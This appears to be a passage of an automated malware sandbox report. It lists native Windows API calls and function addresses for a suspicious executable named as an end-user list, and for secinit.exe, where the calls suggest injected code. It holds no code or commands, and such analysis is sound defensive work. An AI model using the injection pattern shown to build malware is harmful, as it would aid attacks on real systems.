                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2E80 NtReadVirtualMemory,2_2_012E2E80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2EE0 NtQueueApcThread,2_2_012E2EE0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E3010 NtOpenDirectoryObject,2_2_012E3010
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E3090 NtSetValueKey,2_2_012E3090
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E39B0 NtGetContextThread,2_2_012E39B0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E3D10 NtOpenProcessToken,2_2_012E3D10
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E3D70 NtOpenThread,2_2_012E3D70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03944340 NtSetContextThread,LdrInitializeThunk,7_2_03944340
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03944650 NtSuspendThread,LdrInitializeThunk,7_2_03944650
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_03942BA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03942BF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03942BE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942B60 NtClose,LdrInitializeThunk,7_2_03942B60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942AD0 NtReadFile,LdrInitializeThunk,7_2_03942AD0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942AF0 NtWriteFile,LdrInitializeThunk,7_2_03942AF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942FB0 NtResumeThread,LdrInitializeThunk,7_2_03942FB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942FE0 NtCreateFile,LdrInitializeThunk,7_2_03942FE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942F30 NtCreateSection,LdrInitializeThunk,7_2_03942F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_03942E80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03942EE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942DD0 NtDelayExecution,LdrInitializeThunk,7_2_03942DD0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03942DF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03942D10
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03942D30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03942CA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03942C70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942C60 NtCreateKey,LdrInitializeThunk,7_2_03942C60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039435C0 NtCreateMutant,LdrInitializeThunk,7_2_039435C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039439B0 NtGetContextThread,LdrInitializeThunk,7_2_039439B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942B80 NtQueryInformationFile,7_2_03942B80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942AB0 NtWaitForSingleObject,7_2_03942AB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942F90 NtProtectVirtualMemory,7_2_03942F90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942FA0 NtQuerySection,7_2_03942FA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942F60 NtCreateProcessEx,7_2_03942F60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942EA0 NtAdjustPrivilegesToken,7_2_03942EA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942E30 NtWriteVirtualMemory,7_2_03942E30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942DB0 NtEnumerateKey,7_2_03942DB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942D00 NtSetInformationFile,7_2_03942D00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942CC0 NtQueryVirtualMemory,7_2_03942CC0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942CF0 NtOpenProcess,7_2_03942CF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03942C00 NtQueryInformationProcess,7_2_03942C00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03943090 NtSetValueKey,7_2_03943090
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03943010 NtOpenDirectoryObject,7_2_03943010
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03943D10 NtOpenProcessToken,7_2_03943D10
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03943D70 NtOpenThread,7_2_03943D70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_030A93A0 NtReadFile,7_2_030A93A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_030A9240 NtCreateFile,7_2_030A9240
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_030A9690 NtAllocateVirtualMemory,7_2_030A9690
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_030A9530 NtClose,7_2_030A9530
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_030A9490 NtDeleteFile,7_2_030A9490
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_037DF980 NtSetContextThread,7_2_037DF980
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_02C4E4AC0_2_02C4E4AC
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_02D826800_2_02D82680
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05E895740_2_05E89574
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05E80D600_2_05E80D60
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05E81C280_2_05E81C28
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05E849C00_2_05E849C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05E895660_2_05E89566
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05E8B2900_2_05E8B290
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F313900_2_05F31390
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F35CE00_2_05F35CE0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F32A680_2_05F32A68
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F3E4B00_2_05F3E4B0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F3E4A00_2_05F3E4A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F350580_2_05F35058
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F313980_2_05F31398
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F3D2100_2_05F3D210
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F3D2000_2_05F3D200
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F3CDD80_2_05F3CDD8
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F35CD10_2_05F35CD1
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F35FC80_2_05F35FC8
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F35FB80_2_05F35FB8
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F35F5F0_2_05F35F5F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F3EF200_2_05F3EF20
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F3EF100_2_05F3EF10
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 0_2_05F3C99A0_2_05F3C99A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00418B632_2_00418B63
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0042F1F32_2_0042F1F3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00402AE02_2_00402AE0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_004033C52_2_004033C5
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_004033D02_2_004033D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_004103AA2_2_004103AA
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_004103B32_2_004103B3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00416D5E2_2_00416D5E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00416D632_2_00416D63
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0040E5C32_2_0040E5C3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_004105D32_2_004105D3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_004025822_2_00402582
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_004025902_2_00402590
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00402F402_2_00402F40
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0040E75C2_2_0040E75C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0040276A2_2_0040276A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_004027702_2_00402770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0040E7122_2_0040E712
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0040E7132_2_0040E713
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00402F3D2_2_00402F3D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A01002_2_012A0100
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134A1182_2_0134A118
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013381582_2_01338158
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013641A22_2_013641A2
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013701AA2_2_013701AA
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013681CC2_2_013681CC
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013420002_2_01342000
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136A3522_2_0136A352
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013703E62_2_013703E6
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012BE3F02_2_012BE3F0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013502742_2_01350274
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013302C02_2_013302C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B05352_2_012B0535
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013705912_2_01370591
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013544202_2_01354420
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013624462_2_01362446
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0135E4F62_2_0135E4F6
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B07702_2_012B0770
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D47502_2_012D4750
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AC7C02_2_012AC7C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CC6E02_2_012CC6E0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C69622_2_012C6962
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B29A02_2_012B29A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0137A9A62_2_0137A9A6
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012BA8402_2_012BA840
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B28402_2_012B2840
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012968B82_2_012968B8
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE8F02_2_012DE8F0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136AB402_2_0136AB40
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01366BD72_2_01366BD7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AEA802_2_012AEA80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012BAD002_2_012BAD00
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134CD1F2_2_0134CD1F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C8DBF2_2_012C8DBF
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AADE02_2_012AADE0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0C002_2_012B0C00
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01350CB52_2_01350CB5
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A0CF22_2_012A0CF2
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01352F302_2_01352F30
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012F2F282_2_012F2F28
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D0F302_2_012D0F30
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01324F402_2_01324F40
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132EFA02_2_0132EFA0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A2FC82_2_012A2FC8
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136EE262_2_0136EE26
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B0E592_2_012B0E59
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136CE932_2_0136CE93
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C2E902_2_012C2E90
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136EEDB2_2_0136EEDB
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E516C2_2_012E516C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129F1722_2_0129F172
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0137B16B2_2_0137B16B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012BB1B02_2_012BB1B0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136F0E02_2_0136F0E0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013670E92_2_013670E9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B70C02_2_012B70C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0135F0CC2_2_0135F0CC
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136132D2_2_0136132D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129D34C2_2_0129D34C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012F739A2_2_012F739A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B52A02_2_012B52A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013512ED2_2_013512ED
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CD2F02_2_012CD2F0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CB2C02_2_012CB2C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013675712_2_01367571
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134D5B02_2_0134D5B0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013795C32_2_013795C3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136F43F2_2_0136F43F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A14602_2_012A1460
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136F7B02_2_0136F7B0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012F56302_2_012F5630
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013616CC2_2_013616CC
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013459102_2_01345910
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B99502_2_012B9950
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CB9502_2_012CB950
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131D8002_2_0131D800
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B38E02_2_012B38E0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136FB762_2_0136FB76
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CFB802_2_012CFB80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01325BF02_2_01325BF0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012EDBF92_2_012EDBF9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01323A6C2_2_01323A6C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01367A462_2_01367A46
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136FA492_2_0136FA49
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012F5AA02_2_012F5AA0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01351AA32_2_01351AA3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134DAAC2_2_0134DAAC
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0135DAC62_2_0135DAC6
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01367D732_2_01367D73
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B3D402_2_012B3D40
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01361D5A2_2_01361D5A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CFDC02_2_012CFDC0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01329C322_2_01329C32
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136FCF22_2_0136FCF2
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136FF092_2_0136FF09
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136FFB12_2_0136FFB1
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B1F922_2_012B1F92
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01273FD52_2_01273FD5
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01273FD22_2_01273FD2
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B9EB02_2_012B9EB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0391E3F07_2_0391E3F0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039D03E67_2_039D03E6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039CA3527_2_039CA352
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039902C07_2_039902C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039B02747_2_039B0274
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039D01AA7_2_039D01AA
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039C41A27_2_039C41A2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039C81CC7_2_039C81CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039AA1187_2_039AA118
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039001007_2_03900100
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039981587_2_03998158
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039A20007_2_039A2000
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0390C7C07_2_0390C7C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039347507_2_03934750
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039107707_2_03910770
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0392C6E07_2_0392C6E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039D05917_2_039D0591
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039105357_2_03910535
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039BE4F67_2_039BE4F6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039B44207_2_039B4420
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039C24467_2_039C2446
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039C6BD77_2_039C6BD7
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039CAB407_2_039CAB40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0390EA807_2_0390EA80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039129A07_2_039129A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039DA9A67_2_039DA9A6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039269627_2_03926962
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_038F68B87_2_038F68B8
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0393E8F07_2_0393E8F0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0391A8407_2_0391A840
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039128407_2_03912840
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0398EFA07_2_0398EFA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03902FC87_2_03902FC8
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03930F307_2_03930F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039B2F307_2_039B2F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03952F287_2_03952F28
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03984F407_2_03984F40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03922E907_2_03922E90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039CCE937_2_039CCE93
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039CEEDB7_2_039CEEDB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039CEE267_2_039CEE26
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03910E597_2_03910E59
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03928DBF7_2_03928DBF
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0390ADE07_2_0390ADE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039ACD1F7_2_039ACD1F
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0391AD007_2_0391AD00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039B0CB57_2_039B0CB5
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03900CF27_2_03900CF2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03910C007_2_03910C00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0395739A7_2_0395739A
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039C132D7_2_039C132D
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_038FD34C7_2_038FD34C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039152A07_2_039152A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0392B2C07_2_0392B2C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0392D2F07_2_0392D2F0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039B12ED7_2_039B12ED
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0391B1B07_2_0391B1B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039DB16B7_2_039DB16B
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0394516C7_2_0394516C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_038FF1727_2_038FF172
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039170C07_2_039170C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039BF0CC7_2_039BF0CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039C70E97_2_039C70E9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039CF0E07_2_039CF0E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039CF7B07_2_039CF7B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039C16CC7_2_039C16CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039556307_2_03955630
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039AD5B07_2_039AD5B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039D95C37_2_039D95C3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039C75717_2_039C7571
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039CF43F7_2_039CF43F
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039014607_2_03901460
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0392FB807_2_0392FB80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03985BF07_2_03985BF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0394DBF97_2_0394DBF9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039CFB767_2_039CFB76
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03955AA07_2_03955AA0
